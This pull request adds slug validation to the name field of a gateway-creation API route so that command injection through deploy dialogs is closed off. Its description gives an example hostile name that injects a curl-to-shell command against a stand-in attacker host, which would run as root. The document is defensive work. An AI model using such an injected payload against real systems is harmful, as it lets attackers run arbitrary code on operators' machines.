### PR TITLE
fix(gateway): enforce slug schema on v3 gateway name

### DIFF
--- a/backend/src/ee/routes/v3/gateway-router.ts
+++ b/backend/src/ee/routes/v3/gateway-router.ts
@@ -8,6 +8,7 @@ import { ApiDocsTags, GATEWAYS } from "@app/lib/api-docs";
 import { UnauthorizedError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
+import { slugSchema } from "@app/server/lib/schemas";
 import { getTelemetryDistinctId } from "@app/server/lib/telemetry";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
 import { ActorType, AuthMode } from "@app/services/auth/auth-type";
@@ -88,7 +89,7 @@ export const registerGatewayV3Router = async (server: FastifyZodProvider) => {
       operationId: "createGateway",
       tags: [ApiDocsTags.GatewaysV3],
       body: z.object({
-        name: z.string().trim().min(1).max(64).describe(GATEWAYS.CREATE.name),
+        name: slugSchema({ field: "name" }).describe(GATEWAYS.CREATE.name),
         authMethod: SettableAuthMethodInputSchema.describe(GATEWAYS.CREATE.authMethod)
       }),
       response: {


### PR DESCRIPTION
## Context

The v3 gateway create route only length-checked the name, so a user could create a gateway named like `gw; curl attacker/p|sh #`. That name is later interpolated into the shell commands shown in the deploy dialog, so the next operator who copies and runs the command gets command injection (as root, since the command uses `sudo`). This enforces a slug schema so names can only contain lowercase letters, numbers, and hyphens.

## Steps to verify the change

- `POST /api/v3/gateways` with a name containing shell metacharacters now returns 422.
- `make reviewable-api` passes.

## Type

- [x] Fix
- [ ] Feature
- [ ] Improvement
- [ ] Breaking
- [ ] Docs
- [ ] Chore

## Checklist

- [x] Title follows the [conventional commit](https://www.conventionalcommits.org/en/v1.0.0/#summary) format: `type(scope): short description`
- [x] Tested locally
- [ ] Updated docs (if needed)
- [ ] Updated CLAUDE.md files (if needed)
- [ ] Read the [contributing guide](https://infisical.com/docs/contributing/getting-started/overview)